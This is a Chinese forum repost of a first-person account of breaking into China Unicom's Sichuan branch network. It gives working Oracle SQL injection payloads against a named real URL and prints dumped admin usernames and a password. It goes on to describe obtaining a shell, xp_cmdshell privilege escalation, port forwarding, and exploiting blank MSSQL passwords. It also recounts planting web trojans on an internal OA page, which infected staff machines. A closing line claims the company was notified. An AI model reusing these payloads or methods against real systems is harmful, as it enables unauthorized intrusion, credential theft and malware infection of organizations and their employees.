服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 5425|回复: 0

入侵**四川联通分公司

[复制链接]
dirtysea 发表于 2012-6-26 11:45:25 | 显示全部楼层 |阅读模式
文章作者:Nicholas
渗透联通之旅,原来入侵过四川联通.
今日再次看看.发现一个jsp页面的get连接.就忍不住的想测试
http://www.sc.chinaunicom.com/local/content.jsp?localid=9
先加上   and 1=1   , and 1=2 . 貌似有注入.
普遍情况下,JSP相对采用SYBASE,MYSQL,ORACLE数据库.那就一个个测试吧.
当测试Dual表的时候返回正确了 And 0<>(select count(*) from dual)
说明是Oracle数据库.   现在数据库已经弄清楚了,可以使用order by来测试字了.
order by 10– 返回错误.   接着order by 6的时候返回正确. order by 7返回错误.
说明6个字. 现在构造查询语句. 其实跟MYSQL手工注入差不多
and   1=1 null,null,null,null,null,null from dual– 返回错误页面.
然后把null加上单引号测试字符类型. 还是错误页面.
还剩下一种常用数据类型. 那就是数字了.
and 1=2 union select 1,’2′,3,’4′,5,’6′ from dual–
在新闻标题和新闻内容出现了"2"   已经爆出了数据库字段位置了.
先看看数据库版本吧.
and 1=2 union select 1,’(select banner from sys.v_$version where rownum=1)’,3,’4′,5,’6′ from dual–
返回页面出现   oracle9i Enterprise Edition Release 9.2.0.1.0 – 64bit Production
然后使用(select SYS_CONTEXT (‘USERENV’, ‘CURRENT_USER’) from dual)来爆数据库用户名吧
用户名爆出来了CHINAUNICOM
接着通过logfile函数获取日志文件路径.(select member from v$logfile where rownum=1)
出现/oracle/oradata/uniscdb/redo03.log   看这个路径,说明不会是WIN系统平台.是LINUX或许UNIX或许其他的
玩过注入的朋友,都知道注入猜表都是 select * from [table] 那么来一个个测试.相当于盲注
或许有人会说MSSQL的多句查询在显错状态下可以直接爆出表名. 但是有拓展延伸性的.
接着就是ORACLE发挥自己强大之处的地方了.
and 1=2 union select 1,TABLE_NAME,3,’4′,5,’6′ from USER_TABLES–
出现了很多表
MOBILE_AREA SMS_DELIVER SMS_DELIVER_LOG SMS_REPORTMSG …………
经过5分钟查阅,终于找到管理员表了。
http://www.sc.chinaunicom.com/local/content.jsp?localid=9 and 1=2 union select 1,NAME,3,’4′,5,’6′ from UNICOM_USER–
管理员账号 123 kf_jlb sa sichuan zhangyl
接着NAME换成PASSWORD爆出密码
123 kf_jlb mb747576 sa
通过一些工具找到后台登陆的地方了。
http://www.sc.chinaunicom.com/manage/login.do
现在进去看看吧。
登陆成功。 既然进去了,就尝试拿拿shell吧.
大家一定要开VPN.否则后果很严重.
通过新闻添加的NC提交,拿到一个shell.继续渗透之路
首先看看系统版本吧.
用uname命令.回显是 SUN OS 5.9
WEB路径 /bea/user_projects/domains/unicom_business/
因为系统版本无exploitz,估计本地溢出很渺茫
在WEB上级目录发现一个OA_SYSTEM_DATASCRIP目录
进去看看吧,反正也不知道该如何是好.
人品真的很好,竟然让我找到一个jar数据封装.
里面写着一台IP为 172.0.25.33的MSSQL服务器SA账号密码
有这个就好办了.连接上去,随便建立一个库,一个表一个字段
里面随便写个值,构造一个注入点放到四川联通WEB目录下.
拿起工具直接注射过去.获得一些信息.数据库版本mssql2000
权限SA,用户DBO,数据库TEST,多句执行:YES,显错开启。
JSP+MSSQL敢用SA,第一次见。太犀利了。
直接用x去掉我p_去掉我cm去掉我dshell提权.竟然还真提起来了.3389失败了
问题来了.服务器是在172.0.25.X的内网.3389又连不上
正在想是不是3389过滤了.因为netstat -an看了一下
MSSQL与几台119.6.253.X的几台服务器是监听状态
发不行,干脆来点狠的.直接通过XP_C去掉我MDSHELL改了3389端口
因为是2003,不需要重启.继续做了端口转发.
然后我本机的htran有提示连接了.
打开mstsc连接 127.0.0.1:13389
出现了可爱的Windows 2003 datacenter Server登陆界面
进去以后在硬盘里面翻了一下,发现是一台专业数据服务器
输入ipconfig /all看了下。吓我一跳。
3个连接
192.168.50.4
172.0.25.33
10.0.30.42
这下估计有得渗透了,挂起X-SCAN先扫描192.168.50.X网段。
其中192.168.50.[39,43,44,49] 存在MSSQL SA空口令.轻松拿到权限.
其中192.168.50.[23,27]存在IIS写权限漏洞.直接用老兵工具拿到两个shell.
192.168.50,23服务器上是联通秘书运营OA平台. COUNT目录下有个计数器.
每天有一些10.0.23.X-10.0.27.X的客户端登陆这个OA平台.凭感觉断定这些是联通职员的工作客户端.
以前去**移动交话费的时候,有几次不经意的看到营业厅的客户端上是XP系统,而且都没安装杀毒软件
三款网页组合木马,先本地测试看看是否会造成客户端卡屏或者程序bug.
测试完成后,在OA首页挂了代码.果然是好RP.一小时过后,慢慢的有23台肉鸡上线.
看了下远程桌面,好像也没什么特别的,只是开了**联通业务WEB在线作业平台.可能是客服部门的吧.
在192.168.50.39上开着cain,放那里没管它.
继续回到192.168.50.4上面做渗透. 拿起X-SCAN扫描172.0.25.X子段.
扫到一台LINUX 172.0.25.68上面有个网站是默认的IP URL.index.php存在remote include file漏洞
在数据库服务器安装了php环境,放了一个php马.然后再172.0.25.68上远程含利用成功获得shell.
进去后才知道是四川联通的客户信息管理系统.好淫荡的想法来了.也是此次渗透最关键的地方.
马上得到oracle账号密码,连接上去读取管理员账号密码.结果我淫荡的想法被破灭了
网站是C/S模式的,有独立HTTPS个人证书.也就意味着HASH也是无法破解的,因为管理用户是独立的HASH SID.
返回到192.168.50.39上面,抓到一些hash和一些明文密码.试着在线破解.有几个密码破解出来了.
登陆上去继续提权.渗透到这个地方告一段落.
这次渗透总共获得65台服务器权限,包括2个域管理权限.
内网安全一塌糊涂,特别是群集的网段需要特别注意密码安全,否则一击即中.
在入侵中,需要多出运用新的思路.翻看教程没有错,但是完全照抄就是SB了.
在本次入侵检测后,我已经通知四川联通技术部门处理这些安全漏洞
植入的木马和后门已经协助四川联通技术部删除.在这里感谢sLock提供的三款网页木马。
请各位看官要切记,善于利用自己的技术来帮助他人,不要非法入侵做一些损人不利己的事情。



您可以任意转载本文,但转载时请以超链接形式标明文章原始出处和作者信息及版权声明
作者:神刀,原文链接:http://www.shellsec.com/tech/2371.html

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家 ( 蜀ICP备12020351号 )

GMT+8, 2018-12-16 10:04 , Processed in 0.061683 second(s), 18 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表